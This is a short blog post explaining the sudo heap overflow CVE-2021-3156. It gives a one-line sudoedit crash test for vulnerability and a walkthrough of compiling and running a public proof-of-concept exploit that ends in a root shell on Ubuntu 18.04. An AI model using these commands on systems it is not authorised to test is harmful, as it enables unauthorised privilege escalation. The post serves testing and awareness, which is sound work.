CVE-2021-3156

Posted on Feb 19, 2023

In January 2021, Qualys released a blog post detailing a terrifying new vulnerability in the Unix sudo program. Specifically, this was a heap buffer overflow allowing any user to escalate privileges to root – no misconfigurations required. This exploit works with the default settings, for any user regardless of sudo permissions, which makes it all the scarier. The vulnerability has been patched, but affects any unpatched version of the sudo program from 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1, meaning that it’s been around for the last ten years.

Test

Fortunately there is a very easy method we can use to check; simply enter this command into a terminal:

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)

This means its vulnerable. For comparison let’s run the same on my laptop.

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...

Exploit

There is a public exploit here.

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Then run the exploit

$ ./sudo-hax-me-a-sandwich 
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
usage: ./sudo-hax-me-a-sandwich <target>
available targets:
,------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
,------------------------------------------------------------

In my example the target OS is Ubuntu 18.04.5, so I’ll use that option.

$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

# whoami
root

And it’s hacking like its 2010 all over again.